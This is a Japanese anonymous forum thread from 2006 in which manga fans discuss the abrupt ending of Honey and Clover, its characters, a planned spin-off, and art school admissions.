>>511
ほんとだ、表紙にも書いてないしこの煽り文句だと
「大好評連載中☆」って感じだよね。
読んだ時、まじで2〜3話すっとばしてんじゃないかと思ったよ。

これって打ち切りってやつなん?
あまりにも終わり方が唐突な気がするよ。
散々ガイシュツだろうけど、はぐの手は治ったのかとか、
修ちゃんの「きっかけ」はなんだ?とか(これが一番気になる。先月すごいびっくりしたし)、
リカ&真山はどうなったのかとかさー、なんか色々もっと丁寧に書くところあるやん。
なんかもう、意味がわからん。
竹本旅立ちのラストだけは良かったと思うけど、それまでに意味不明なところが多すぎる。

515 :花と名無しさん:2006/08/01(火) 19:38:40 ID:???0
次の号から「ハチクロ」ってタイトルで続いたらどうしよう…
ハレグウみたいに・・・って誰もしらねえよ!

516 :花と名無しさん:2006/08/01(火) 19:41:56 ID:???O
修復士・竹本んとこに、倉持くん(だっけ?絵画教室のメガネ少年)が
自分探しに迷い込まなきゃいいけどな。>スピンオフ

517 :花と名無しさん:2006/08/01(火) 19:42:26 ID:???0
下世話な話でアレなんだけど、妹か娘のように思ってた相手を
なんで女としてみるようになるの?
恋愛対象になって良い関係に移っていければ、当然セクースとかするんだろうし。
なんか修はぐがセクースってキモいよ・・・。

518 :花と名無しさん:2006/08/01(火) 19:43:18 ID:???0
>514
私も打ち切りのように感じました。
なんだか胸のもやもやが残ったままで
置いてきぼりをくらったような気分です。

519 :花と名無しさん:2006/08/01(火) 19:43:31 ID:???O
竹本のことをケリつけて終了させて排除して、スピンオフで萌え萌えな趣味につっぱしるんでない?

520 :花と名無しさん:2006/08/01(火) 19:45:11 ID:???O
>>517
はぐは気持ちは森田好きだからやらないかもよ。臭はひとりで発散

521 :花と名無しさん:2006/08/01(火) 20:01:10 ID:???0
>>520
はぐの使ってるバスタオルとかに顔をうずめたり、
浴槽のフチを「ああ ここではぐが…」とかいって
なでまわしたりしながら発散するんじゃない?

522 :花と名無しさん:2006/08/01(火) 20:10:58 ID:???0
はぐって他の人のエネルギーを吸い取ってしゃあしゃあと長生きしそう

523 :花と名無しさん:2006/08/01(火) 20:37:01 ID:???0
>>522
自分の周りの芸術家は結構そんなんばっかだよ^^

524 :花と名無しさん:2006/08/01(火) 20:37:09 ID:???0
独身男の場合。
兄姉の子供やいとこの子供とかって妙にかわいくて仕方ない。
って感じがするんだけど・・・



525 :花と名無しさん:2006/08/01(火) 20:46:37 ID:???0
>>515
ハレグゥ&ジャングルはいつもハレのちグウ
わかるからダイジョブ。
アニメ版がえらい出来がよくて面白かった。
主題歌も内容にあってたし。

526 :花と名無しさん:2006/08/01(火) 20:49:13 ID:???0
スピンオフ
人気作品のサブキャラクターをフィーチャーした作品。
元の作品のバックボーンやその後を描いたり描かなかったりする。
http://d.hatena.ne.jp/keyword/%A5%B9%A5%D4%A5%F3%A5%AA%A5%D5

竹本は最終回でひさしぶりに主役らしくふるまったので
脇役フィーチャリング作品である
スピンオフでは出ないんでしょうね。

527 :花と名無しさん:2006/08/01(火) 20:52:49 ID:???0
本誌ラスト、スピンオフを萌え一色にしたいが為の竹本エンドだった悪寒…
竹本排除(´・ω・) カワイソス

528 :花と名無しさん:2006/08/01(火) 21:00:36 ID:???O
>>527
私もそう感じたよ。
あと数話続きそうだったのにいきなり予告ナシの最終回にしたことも納得できる

529 :花と名無しさん:2006/08/01(火) 21:15:43 ID:???O
スピンオフで最近のって言うと青木琴美の「僕の初恋を〜」とかかな。
あと池野恋のときめきミッドナイトもか

530 :花と名無しさん:2006/08/01(火) 22:14:49 ID:???O
将棋マンガはスピンオフ終わってから?

531 :花と名無しさん:2006/08/01(火) 22:21:08 ID:???0
>>505
亀だけど、祖母には怒られていたよ>はぐみ
あの時の祖母は精神的にも普通じゃなかったけれどもね。

532 :花と名無しさん:2006/08/01(火) 22:28:02 ID:???O
>>531
祖母みたいにむやみに叱る人か、むやみに甘やかす人しかいないんだね。はぐには。

533 :花と名無しさん:2006/08/01(火) 22:30:44 ID:???O
新連載★ハチミツとクローバースピンオフ
本編以上の長期連載?
メインキャラは真山?臭?飲み屋?マリオルイジ?
あー楽しみー(棒読み

534 :花と名無しさん:2006/08/01(火) 22:33:42 ID:???0
まだもうちょっと続くんじゃ

535 :花と名無しさん:2006/08/01(火) 22:38:43 ID:???O
はぐは自己投影キャラだから、周りのみんなに好かれるの☆彡
責める人ははぐに嫉妬してるの☆彡

となるわけ

536 :花と名無しさん:2006/08/01(火) 22:40:10 ID:???O
そもそもギャグシーンも作者のノリツッコミが痛々しい時があるわな

537 :花と名無しさん:2006/08/01(火) 22:43:02 ID:???0
>>532
それじゃすごくアンバランスな人間関係しか築けないのも当然か。

山田、理花ですら野宮、真山にキツめの説教されていたのに
実は一番周囲を振り回していたはぐに対して竹本も森田も何も言わなかったのがすげえな。

本当は見た目は子供、内面は大人なキャラを描きたかったんだろうけど
周囲の過剰な甘やかし描写のせいで結局台無しになっているように見える。

538 :花と名無しさん:2006/08/01(火) 23:10:56 ID:???0
>本当は見た目は子供、内面は大人なキャラ
504にもあるけど、結果としては内面計算がっちり、男ども全員キープな恐ろしい子になったね。

539 :花と名無しさん:2006/08/01(火) 23:12:41 ID:???0
見た目は子供、したたかさは大人…

540 :花と名無しさん:2006/08/01(火) 23:13:17 ID:???0
はぐ、恐ろしい子!(白目)

541 :花と名無しさん:2006/08/01(火) 23:14:29 ID:???0
はぐノート
ttp://www.hcn.zaq.ne.jp/gallerycraft/hagunote.html

はぐみは恐ろしい子なんです

542 :花と名無しさん:2006/08/01(火) 23:14:30 ID:???0
ガラかめネタって根強いね。

543 :花と名無しさん:2006/08/01(火) 23:15:48 ID:???0
ノ・・・ノミタク!

544 :花と名無しさん:2006/08/01(火) 23:21:25 ID:???0
ノミタク…悪そうだっ!!

545 :花と名無しさん:2006/08/01(火) 23:21:46 ID:???0
はぐは八方美人だから嫌われるんだよ。
山田もハッキリしないから反感買う。

546 :花と名無しさん:2006/08/01(火) 23:30:47 ID:???0
ノミタクキモス

547 :花と名無しさん:2006/08/01(火) 23:31:33 ID:???O
>>545
いい子ちゃんでいたいんだよね。
何言われても私はこうする!みたいな覚悟のある選択を泣いてにげる傾向がある

548 :花と名無しさん:2006/08/01(火) 23:33:39 ID:???0
>>542
ガラかめネタじゃなくてデスノートネタだよ

549 :花と名無しさん:2006/08/01(火) 23:34:18 ID:???0
はぐノートワロス

550 :花と名無しさん:2006/08/01(火) 23:40:57 ID:???O
はぐノート、一巻で出て来た嫌味な同級生の名前がかいてあるんだろうな

551 :花と名無しさん:2006/08/01(火) 23:43:38 ID:???0
はぐが同級生の名前と顔を一致させられるとは到底思えないw

552 :花と名無しさん:2006/08/01(火) 23:47:04 ID:???0
2コマ目テラオソロシス
ツボりました

553 :花と名無しさん:2006/08/01(火) 23:48:04 ID:???0
ハグノートには欲しいもの書くと手に入るんでしょ。
森田と竹本と修ちゃんも描いてあったんだよ。

554 :花と名無しさん:2006/08/01(火) 23:50:19 ID:???0
ああ、みんなの集合した写真がないのははぐがノートに切って貼っちゃったからなんだな。

555 :花と名無しさん:2006/08/01(火) 23:52:34 ID:???O
手に入れて始めに書いたのが、才能だったんだな。


最近、身長と書いたからのびたのか。最終回の表紙、背のびすぎ。


スピンオフでは、美乳で登場するかもな

556 :花と名無しさん:2006/08/01(火) 23:55:33 ID:???0
>>541
野宮にワロタ・・・www

557 :花と名無しさん:2006/08/01(火) 23:56:15 ID:???0
四葉もそうやって簡単に手に入れたんだね
そうとは知らずに感激する竹本
計算高い子!

558 :花と名無しさん:2006/08/02(水) 00:34:26 ID:???0
森田と竹本以外は、これからもちょくちょく集まりそうだな・・・
と思った最終回。

559 :花と名無しさん:2006/08/02(水) 00:40:33 ID:???0
山田と真山は気まずくないのかな
普通超気まずい間柄のような気もするんだけどなぁ・・・
謎だ

560 :花と名無しさん :2006/08/02(水) 00:42:46 ID:???0
いいからお前等はたけのこに感情移入してろ

561 :花と名無しさん:2006/08/02(水) 00:48:30 ID:???0
感情移入きもい

562 :花と名無しさん:2006/08/02(水) 00:53:38 ID:???0
竹本と森田は今後一生会わないのかもね。
進む道というか住む世界が違うというのはそういうことなのかと。

563 :花と名無しさん:2006/08/02(水) 01:00:13 ID:???0
>>562
モカデミー賞関係で森田がテレビに映るたびに
「パパはなぁ、この人と同じ大学で友達だったんだぞー」
「えー、ウソだぁー。信じられないよー」
「本当だって、昔からこんな人だったんだよ」
「あらあら、そうなの?あなた」

こんな家族の会話を想像してしまった(´・ω・`)

564 :花と名無しさん:2006/08/02(水) 01:05:56 ID:???0
>>563
(´・ω・`)

そして家族が寝静まった夜更けに、森田に関する記事を
新聞や雑誌から切り抜き、スクラップ帳に張り付けていく竹本。
そして一人ごとを呟く。
「森田さん、頑張ってるんだなぁ。元気かなぁ。元気だよなぁ。
俺、こういうことしかできないけど応援してますから」

565 :花と名無しさん:2006/08/02(水) 01:18:54 ID:???0
さすが日本一片想いの似合う男
泣けてくるよ

566 :花と名無しさん:2006/08/02(水) 01:24:29 ID:???0
森田ヲタやりすぎ

567 :花と名無しさん:2006/08/02(水) 01:35:54 ID:???0
>>566
563だが、たけのこファンだコノヤロー!

実際10年後くらいにはあの頃の事を懐かしく思い出しつつ
平凡だけど良い職人兼お父さんになっていそうだな

山田と真山にも言えることだけど、そばにいて想い続けているから執着心で一杯になるけど
案外ああいうのは離れてもう会えなくなると徐々に消えていくもんだよ
懐かしく思うことはあってもな

568 :花と名無しさん:2006/08/02(水) 01:54:48 ID:???O
あゆってマヤマを忘れる努力ってなんかしてたの?
グチグチうぜえ女

569 :花と名無しさん:2006/08/02(水) 02:01:06 ID:???0
グチグチしてても君が好きだよ☆て言ってくれる王子が迎えにきますた

570 :花と名無しさん:2006/08/02(水) 03:45:52 ID:???O
>>568
忘れようと努力しても簡単に忘れられるもんではないんですよ。
恋愛慣れしてる人ならまだしも、山田から真山への恋愛感情は中学生の初恋レベルだからなあ。
稚拙でグジグジしてるのもしょうがないんじゃないかと。

571 :花と名無しさん:2006/08/02(水) 07:01:40 ID:???0
なんかどれも「〜〜だからしょうがない」なんだよな。

572 :花と名無しさん:2006/08/02(水) 07:03:18 ID:???0
今日、眠る時に見る夢で、ハチクロの夢見てしまったよ。
なんかね、竹本がすごい輝いてるハチクロを読む夢。
どんなに大好きな漫画でも
わたしは漫画の夢って見たことなくて
漫画の夢を見たのなんて生まれてはじめてだったのさ。

このスレでここ3ヶ月くらいは何度かアンチ発言したのに
わたしはハチクロ相当好きだったんだな…。(゚∀゚)アハハハハ


573 :花と名無しさん:2006/08/02(水) 08:16:23 ID:???O
話が変わると思いますがすみません。

地方ものなんで久々に東京にきたんですが、ハチ黒に縁のある場所やら、なにかやっている場所ありますかね?急に暇になってしまいまして、調べてなくて…大変申し訳ないです。

574 :花と名無しさん:2006/08/02(水) 08:27:57 ID:???0
>>573
原作中心なら
都心からは離れるけど葛西臨海公園と
帰りの水上バス(両国まで行くやつ)
もっと離れていいならムサビ。

アニメや映画関連ならお台場でカフェもあるし(アニメ)
ラフォーレ原宿でハチクロ展とかやってるみたい(映画)


575 :花と名無しさん:2006/08/02(水) 09:09:52 ID:???0
森田の兄ちゃん
金持ちなのにどう見ても国産車乗ってるのが好感持てるな。
2人とも金好きなだけで物欲はないのかな。

576 :花と名無しさん:2006/08/02(水) 09:33:19 ID:???0
>575
目的があって金作ってたわけだから。

577 :花と名無しさん:2006/08/02(水) 09:40:24 ID:???0
金好きというより、父親の会社を取り戻したくて
目的を達するまでは金の亡者になってただけだからねぇ。
父の会社を取り戻せたあとは、もう金の亡者になる必要もないわけで。

578 :花と名無しさん:2006/08/02(水) 09:54:45 ID:???0
でも一応金好きキャラは貫いてるよね、
230円なら・・・とか言ってたし。

579 :花と名無しさん:2006/08/02(水) 10:15:36 ID:???0
>■2005/08/28 (日) とてもうれしい
>あとは、みんなの気持ちを抱えて
>物語を無事着地させることだけを考えてがんばります

私はウミノたんのこの言葉を信じて待ちます!!!
そうだよ!このまま最終回のわけ無いジャン!!

580 :花と名無しさん:2006/08/02(水) 10:17:22 ID:???0
>>567
私もたけのこファンなのに
スレに粘着してる信者に森田ヲタ扱いされたヽ(`Д´)ノ ウワーン

森田はつかみどころがなくて
感情移入がしにくいの。

581 :花と名無しさん:2006/08/02(水) 10:18:56 ID:???0
>>571
ハチクロワールドですからね…。
つっこむのももう諦めちゃってる。

582 :花と名無しさん:2006/08/02(水) 10:29:05 ID:???0
森田は王子だと思うことにした

583 :花と名無しさん:2006/08/02(水) 10:52:34 ID:???0
>>575
国産のハイグレード車かもよ。

584 :花と名無しさん:2006/08/02(水) 10:53:18 ID:???0
>>579
今月号は最終回じゃないの?

585 :花と名無しさん:2006/08/02(水) 11:05:27 ID:???O
>>573
井の頭線(渋谷・吉祥寺間を走る)にある浜田山駅の切符を買って帰るのは?

舞台の浜田山は架空の町だけどね。

586 :花と名無しさん:2006/08/02(水) 11:08:42 ID:???0
多摩美とか美術大学で雰囲気を味わうとか。
葛西臨海公園で観覧車乗るとか。


587 :花と名無しさん:2006/08/02(水) 11:18:43 ID:???0
酷い最終回だな
エピソード丸投げジャン

588 :花と名無しさん:2006/08/02(水) 11:39:01 ID:???0
8巻で止めといて正解だったらしいな。
ひでー終わり方。

589 :花と名無しさん:2006/08/02(水) 11:48:27 ID:???0
>>479ってホントなのかな?
スピンオフは10巻に収録されないからコーラス絶対買ってね!ってことなのかな。
プックンとかオサレとかニャンざぶろうみたいな本編ストーリーには関係ない
ギャグっぽい短編だよね?
山崎美和子は気になる人もいるみたいだけど野宮の過去の恋バナは
ウミノさんが野宮とかあゆを描きたいだけみたいに感じるな。

590 :花と名無しさん:2006/08/02(水) 12:07:56 ID:???0
藤原デザインのスピンオフはもうお腹イパーイ

591 :花と名無しさん:2006/08/02(水) 12:10:41 ID:???0
同意
大体本筋から離れたどうでもいいキャラって感じだし…

592 :花と名無しさん:2006/08/02(水) 12:12:39 ID:???0
9巻の表紙の男達が、ウミノ☆さんの萌え萌えキャラなのですね。
ウミノ☆さんと趣味あわねー!!

593 :花と名無しさん:2006/08/02(水) 12:32:51 ID:???O
確かに…お気に入りばっかりだ>9巻表紙の野郎ども
私はこいつら全員嫌いです
本当にありがとうございました

594 :花と名無しさん:2006/08/02(水) 12:39:47 ID:???O
>>592>>593
ナカーマ!(T∀T)人(T∀T)人(T∀T)

595 :花と名無しさん:2006/08/02(水) 12:41:15 ID:???O
ちなみに好きなのは
山崎、ローマイヤ、徳大寺先生、一平さん。

596 :花と名無しさん:2006/08/02(水) 12:44:15 ID:???0
>>595
ナカーマ
特に山崎とローマイヤ辺りが
あとは初期のたけのことかも

眼鏡キャラは好きなはずなのに何故か野宮と真山には心惹かれないんだよなあ

597 :花と名無しさん:2006/08/02(水) 13:38:22 ID:???0
森田兄弟はなんだかんだで下町気質っぽい
特に弟。
映画の森田みたいに本当にハイソ志向なヤツはこの漫画に出て来ないよね
デザイン事務所系の人々もあんなだし。
山崎大好きだ…

598 :花と名無しさん:2006/08/02(水) 13:44:04 ID:???O
あの9巻は 真山がいらね
真山主役でもないのに 表紙一回大石
だいたい 修と野宮が一緒にいるのも違和感
黙って 修 リカ 原田にしときゃあよかったんだ

599 :花と名無しさん:2006/08/02(水) 13:57:45 ID:???0
9巻の表紙は確かに良く分からないけど、この期に及んで修 リカ 原田はあり得ないw
普通に森田兄弟かはぐで良いだろ。

600 :花と名無しさん:2006/08/02(水) 14:10:59 ID:???0
Loftでハチクロのガチャ見つけて、童心に帰ってやってしまった!



ウミノグマだったorz
200円返してくれ…

601 :花と名無しさん:2006/08/02(水) 14:12:10 ID:???0
あっあれ野宮だったのか
修と真山と…誰だと思ってた

602 :花と名無しさん:2006/08/02(水) 15:54:46 ID:???0
色々とツッコミどころはあるけど、まぁ無事に終わってよかったよ…。
最後の最後でたけもとにもちょっとスポットが当たったしさ。

ちくしょう、もっと救いようのない糞な最終回なら
きっぱりウミノ作品やハチクロを嫌いになれたのに。

603 :花と名無しさん:2006/08/02(水) 15:55:22 ID:???0
ウミノグマと、安野ロンパース
どっちがウザイ?

604 :花と名無しさん:2006/08/02(水) 16:13:29 ID:???0
嬉しくもなんともない邪魔な付録のせいで
コーラス買うハメになったからウミノ熊

605 :花と名無しさん:2006/08/02(水) 17:16:47 ID:???0
この漫画おもしろい?

606 :花と名無しさん:2006/08/02(水) 17:35:22 ID:???0
>>605
普通に面白い
ここはアンチの巣だから割り引いて考えないと失敗するよ

607 :花と名無しさん:2006/08/02(水) 17:40:16 ID:???0
>>606ってバカ?
べつにここはアンチスレというわけじゃないんだが…。
ただここ3ヶ月の展開にガッカリしてた読者が多かっただけで。

面白いか面白くないかはその人それぞれだから
何ともいえん。

608 :花と名無しさん:2006/08/02(水) 17:42:25 ID:???0
まぁ、つまらなくなったと。

609 :花と名無しさん:2006/08/02(水) 18:02:24 ID:???0
コーラス買った。
ホントにはぐみ、背伸びてるな。
耳みたいなお団子ヘアーには
しなくなったし。

610 :花と名無しさん:2006/08/02(水) 19:12:42 ID:???0
>577
復讐で金集めしているうち金好きになったか元々素質あったかだな。
でなきゃ干からびかけてるたけのこから食料を奪う森田の説明がつかんw

ああいう徹底した金好きになるともう好感が持てる。

611 :花と名無しさん:2006/08/02(水) 19:14:28 ID:???0
今月号は色々つっこみどころはあったけど
竹本が主人公だー(つ;Д`)
う、うれしい〜〜〜(つ;Д`)

ところで竹本、
はぐちゃんを好きになって良かったってポエムってるけど
でも、それはどうかと思うよ?

612 :花と名無しさん:2006/08/02(水) 19:19:48 ID:???0
はぐや修や森田に逢わなきゃ竹本の人生もうちょっとマシになってたと思う

613 :花と名無しさん:2006/08/02(水) 19:32:59 ID:???0
はぐみや森田が希代の天才って設定になってるけど、ふつうそういう人は
武蔵野美術大学(=浜美大)には行かないと思う。

614 :花と名無しさん:2006/08/02(水) 19:35:57 ID:???0
シッ

615 :花と名無しさん:2006/08/02(水) 19:50:21 ID:???0
>>613
あの世界に芸大に相当する大学があるかどうかわからないじゃないか

と思うことにしてみた

616 :花と名無しさん:2006/08/02(水) 20:08:22 ID:???0
実技は得意だったけど、センター試験で点数取れなくて
芸大に入れないのかな、はぐと森田。

617 :花と名無しさん:2006/08/02(水) 20:17:45 ID:???0
私が知ってるのは音楽の方だけど、芸大って
センターとかあんまり関係が無かったような・・・
結構低い点数の人でも実技良けりゃ入ってたような・・・

金に拘ってるわりになぜ私大に行くのだ森田。

618 :花と名無しさん:2006/08/02(水) 20:23:16 ID:???0
>>612
全くだな

619 :花と名無しさん:2006/08/02(水) 20:29:29 ID:???0
でも、芸大ってセンターの比重、かなり低いって話だよね。
はぐの場合、修にくっついてきたから、武蔵美ってのもあると思うけど。
金にがめつい森田が私学にというのは....確かに

しかし、芸大の実技6時間×4、受かる作品ってどんななんだろう?

620 :花と名無しさん:2006/08/02(水) 20:41:31 ID:???0
のだめの世界でも
(のだめは大学入るまでは、楽しんでピアノを弾くばっかりで
 苦しんで才能を磨くようなことはしてなかったから
 わかるが)
勉強もピアノもきっちりやるような千秋が
芸大じゃない音大に入るのはおかしいというツッコミがあるし
まぁ、それは漫画だからいいんだよ。多分…。

621 :花と名無しさん:2006/08/02(水) 20:59:57 ID:???0
あ、っていうか森田もべつに日本の若手のなかでトップの才能と技術って
ことは一言も言われてなかったよね。じゃあ「武蔵美限定」で
武蔵野美術大学始まって以来の天才ってことかな?それなら納得。
はぐみは行こうと思えば芸大行けたけど、親戚の関係で武蔵に行ったと考えれば
いいかな。

622 :花と名無しさん:2006/08/02(水) 21:20:29 ID:???0
はぐみは、芸大に行ける実力があっても
海外で芸術を磨く実力があっても
地元の田舎か、臭ちゃんのそば以外は行きたくなかったんだろな。

623 :花と名無しさん:2006/08/02(水) 21:26:24 ID:???0
あゆと竹本は中学生みたいに何年も同じ人に片思いしてるとこが似てる
森田や真山はチューしたり行動に移してるけど

624 :花と名無しさん:2006/08/02(水) 22:06:59 ID:???0
森田って子供の頃夜逃げ同然の生活送ったのと
オヤジのお金好きの遺伝で、根っからのお金好きだろ。
ていうか浜美が私大とか考えると修復士のガキが一番マトモに見える。
貧乏だ貧乏だってよりにもよって私大美大でモラトリアム延長してんなよ!!!

625 :花と名無しさん:2006/08/02(水) 22:13:11 ID:???0
私学で留年して8年居続け、おまけに編入
武蔵野なら授業料だけでも年100万強かかるぞ・・・
芸大は国立だから半額以下で済むのに
一体いくら無駄にしたんだ森田よ。
てか今からでも遅くないから転学or芸大の大学院に入りなおすんだ!
稼ぎに出る森田には夜間部がオススメだ
学費26万強だし。

あれ、でも最終回で大学やめたんだっけ?
読んでないからわかんないや。

626 :花と名無しさん:2006/08/02(水) 22:19:49 ID:???0
>>625
億単位で稼いでる森田にとってそんな差は意味ないだろ。

627 :花と名無しさん:2006/08/02(水) 22:27:06 ID:???0
でも竹本のパンの耳は喰うんだね。

628 :花と名無しさん:2006/08/02(水) 22:27:42 ID:???0
>>626
いや、食費も電気代もけちってたからさぁ
まず学費から見直せよって思ったの・・・

629 :花と名無しさん:2006/08/02(水) 22:28:45 ID:???0
芸大に限らず美大の実技ってけっこう微妙
デッサンでもそれぞれ傾向があって
才能だけでカバーしきれないところもある

森田って、100円とか200円の小銭にはこだわるけど
100万単位の金には頓着しないんじゃないの


630 :花と名無しさん:2006/08/02(水) 22:31:06 ID:???0
>>629
才能や個性丸出しの絵じゃなくて
「受験用の絵」というのを描かないと
受からないもんね。
美大予備校に行って
受験用の絵をみんなマスターしてくる。

631 :花と名無しさん:2006/08/02(水) 22:36:05 ID:???0
モカデミー受賞作品のギャラについてピーターに
文句言ってた希ガスるんだが、あれいくらだったっけ?
かなり大きな額だったような。

632 :花と名無しさん:2006/08/02(水) 22:43:50 ID:???0
>>631
4億

633 :花と名無しさん:2006/08/02(水) 22:47:14 ID:???0
美大のこととか全然知らないんだけど
竹本がつくってたデカい塔みたいな卒製ってその後どうなるの?

634 :花と名無しさん:2006/08/02(水) 22:48:25 ID:???0
「終わりの始まり」ってフレーズは
オリジナルラブの歌にあるね

今が変わるなら はるか古代から続く
終わりの始まりを いま始めよう れっつごー

今が変わるなら はるか未来へと続く
終わりの始まりを さあ始めよう カモンれっつごー(あやふや)

635 :花と名無しさん:2006/08/02(水) 22:49:01 ID:???0
>>629
小銭>>>札って…パタリロみたいw

636 :花と名無しさん:2006/08/02(水) 22:49:47 ID:???0
実は浜美は市立だったんだよ

637 :花と名無しさん:2006/08/02(水) 22:54:06 ID:???0
シカゴにある大きな会社、日本の電気屋さんでも製品が売ってるような
大きな会社をひっくり返す株を買ったんですよ。
何億とか転がしてたうちの、シノブはゲンナマフェチなので100万くらいを常に与え
尻ポケットに装着させて上手いこと御してたんだよ、カオル兄は。

638 :花と名無しさん:2006/08/02(水) 22:54:46 ID:???0
>>634
もはや慣用句。
http://www.google.co.jp/search?hl=ja&ie=Shift_JIS&q=%8FI%82%ED%82%E8%82%CC%8En%82%DC%82%E8&btnG=Google+%8C%9F%8D%F5&lr=
ネタモト見つけた!って喜ぶのはゆとり教育の歪み。
目の前の箱で検証しなさい。

639 :花と名無しさん:2006/08/02(水) 22:58:44 ID:???0
「終わりの始まり」というフレーズは,当人は得意の絶頂だけれども気のゆ るみとかで実は足下が危うくなってるといった状況で使うのが一般的だと思うけど,最近 見たウェブ上の記事で,まさに没落が始まった局面についてこの言い方をしていたのが ...

ウ ミ ノ さ ん


640 :花と名無しさん:2006/08/02(水) 23:02:16 ID:???0
武蔵美って何となく型破りな才能型や奇形型が入りやすい美大ってイメージがある。
サイバラだって本当なら美大なんてレベルじゃなかったのに…
そう言う意味では森田や理花が転がり込んでいるってのは違和感無いような気もする。
特に理花は予備校通って受験用の絵を勉強する余裕は無かったんだろう。
で、入ってから超貧乏。

641 :花と名無しさん:2006/08/02(水) 23:04:32 ID:???0
東京に浜田山ってところは本当にあるんだ?
こないだ商品を発想してくれと客に頼まれたよ

642 :花と名無しさん:2006/08/02(水) 23:15:35 ID:???O
>641
そりゃまた難しい事ゆーね、お客さん

643 :花と名無しさん:2006/08/02(水) 23:18:32 ID:???0
>>623
例えばどんな行動?チュー以外に。

644 :花と名無しさん:2006/08/02(水) 23:18:43 ID:???0
はぐと森田って同じベッドで寝てたの?

645 :花と名無しさん:2006/08/02(水) 23:25:39 ID:???0
サイバラが美大に入れたのは謎だよなぁ…。

いや、高校の時の友達に武蔵美卒いるんだけど
その友達はもともと絵はすごく上手かったけど
進学高普通科の高3から美大を目指したので
1年浪人して美大予備校に行って受かったから。
その友達を通して
「へぇ、絵が上手い○○ちゃんでも
 予備校に入って美大用の絵を描く特訓をしないと
 美大って受からないんだ。独学でどうにかなるんじゃないんだ」
と思ったので。


646 :花と名無しさん:2006/08/02(水) 23:29:32 ID:???0
>>645
ああ見えて頭はいいほうだったんじゃないの>西原
大検なんて余裕のよっちゃんだったらしいし
予備校でも結構評判だったらしいと西原の同級生の本に書いてあった

真山か山田のどっちかは一年留年してるんだっけ
それとも浪人か

647 :花と名無しさん:2006/08/02(水) 23:34:15 ID:???0
予備校で評判だったのは奇態な衣装では?>サイバラ
まあ素地はあるけどね。マジ絵の時は確かに上手だし。
潜在能力高くて、生まれ育った環境が劣悪で、潜在的にファザコンである点を鑑みると、
なんだかサイバラが暗黒理花って気がしてきたな…

648 :花と名無しさん:2006/08/02(水) 23:34:33 ID:???0
そういえば小さい子どもってお札よりも小銭(硬貨)の方が喜ぶよねw

649 :花と名無しさん:2006/08/02(水) 23:37:32 ID:???0
サイバラのマジ絵を見たことない…

650 :花と名無しさん:2006/08/02(水) 23:41:24 ID:???0
原田がヤク中で家から追い出したんだだったら
リカももっとラクに生きられたね

651 :花と名無しさん:2006/08/02(水) 23:43:17 ID:???0
>>647
じゃあ美大受験の時に絵の具持ってくるのを忘れて
隣の席の奴(面識なし)に無理矢理頼み込んで
オレンジの絵の具一本だけを貸してもらって
さあこれで描けるぞ!課題は何だ!と思って見てみたら
テーマが「涼しい」だったという西原の同級生は暗黒森田か

652 :花と名無しさん:2006/08/02(水) 23:56:27 ID:???0
金角=原田
銀角=花本
 
金角銀角って予備校で知り合ったんだよな?
美術予備校ってどんなんだ…

653 :花と名無しさん:2006/08/03(木) 00:00:15 ID:???0
>>635
赤ずきんチャチャでも、チャチャもリーヤもしいねちゃんも、
札束では買収されなかったのに、黒服の男の落とした500円玉には
敏感に反応して、「500円ひーらった」って喜んでたぞ。

654 :花と名無しさん:2006/08/03(木) 00:04:57 ID:???0
ねえ、はぐと森田って同じベッドで寝てたの?

655 :花と名無しさん:2006/08/03(木) 00:07:03 ID:???0
しいねちゃん=竹本
リーヤ=森田
修ちゃん=セルヴィ(?)先生

656 :花と名無しさん:2006/08/03(木) 00:11:17 ID:???0
両さん=臭
部長=はぐ父
中川=森田
麗子=山田
戸塚=真山
寺井=竹本

両さんの居候先の幼女(名前忘れた)=はぐ

657 :花と名無しさん:2006/08/03(木) 00:30:18 ID:???0
山田、もう俺のこと見るな

ずっと見ててね、私もあなたのこと見てるから

・・・

658 :花と名無しさん:2006/08/03(木) 00:31:19 ID:???0
強い気持ちーつよーいーあいー

659 :花と名無しさん:2006/08/03(木) 00:32:46 ID:???0
壊れた大切なものと いつかまた会えるひがくるかしら
残した傷跡が消えない それぞれの場所まで もう行かなくちゃ〜

660 :花と名無しさん :2006/08/03(木) 00:47:14 ID:???0
その主題歌に合わせようとして
きっと森田とたれのこは喧嘩別れしたまま終わって
はぐも森たけのこと離れ離れエンドだったんだ。
だって歌の通りじゃん!

661 :花と名無しさん:2006/08/03(木) 00:48:43 ID:???0
たれのこって!

662 :花と名無しさん:2006/08/03(木) 01:02:02 ID:vTFKunR10
残したくちづけは消えない

663 :花と名無しさん:2006/08/03(木) 01:12:57 ID:???0
残した傷跡が消えない→はぐの怪我&リカの傷

664 :花と名無しさん:2006/08/03(木) 01:15:43 ID:???0
黒アゲハ蝶になって誰からも愛されたい
九分九厘無いとしてもほんの一瞬でいいの

黒アゲハ蝶のように誇らしい羽で飛びたい
くだらないって言わないでそんな人生がいいの


じゃ19歳(スガシカオ)はトビラで黒い羽生やしたはぐだな。
膿野さん、歌に影響されすぎ…

665 :花と名無しさん:2006/08/03(木) 01:28:06 ID:???0
>>664
あのトビラ絵のはぐの顔超キモかった

666 :花と名無しさん:2006/08/03(木) 01:34:19 ID:???O
9巻(chapter59)のはぐのお父さんがでてくるシーン〜修が「そうだよ」というシーンの流れ。
何度読んでも意味がわからない。長椅子に座ってる女はだれ?
誰か教えてください…orz

667 :花と名無しさん:2006/08/03(木) 01:36:29 ID:???0
長椅子に座ってる女は腹の中に子供入りのはぐ父の再婚相手

668 :花と名無しさん:2006/08/03(木) 01:40:33 ID:???O
>>541-557
笑った笑った!!

ノミタク・・・スゲ!

669 :花と名無しさん:2006/08/03(木) 01:51:35 ID:???0
>>656
両さんの居候先の幼女は檸檬
とマジレス

670 :花と名無しさん:2006/08/03(木) 01:53:49 ID:g/i2y2p3O
最終回知らないんだけど、理花は結局どうなったの?

671 :花と名無しさん:2006/08/03(木) 02:53:44 ID:GGP9Z3QS0
>>670
自殺。

672 :花と名無しさん:2006/08/03(木) 03:16:59 ID:9K/2Bpz0O
いまいち、はぐの天才ぶりがわからなかったなー。
森田は醤油で絵描いたり胡弓?だっけ難しい楽器をなんなくひいたり、変人な天才っぷりが何となく伝わったけど。

673 :花と名無しさん:2006/08/03(木) 03:30:16 ID:???0
ageる方が多くなりましたね

674 :花と名無しさん:2006/08/03(木) 03:34:11 ID:???O
>>673
あ、スミマセンageちゃいました。。

675 :花と名無しさん :2006/08/03(木) 04:20:56 ID:???0
夜神月→真山
L→森田
リューク→はぐ
ミサ→山田
シブタク→ノミタク
松田→たけのこ

676 :花と名無しさん:2006/08/03(木) 05:17:12 ID:???O
>>667さん
そうだったんですか!
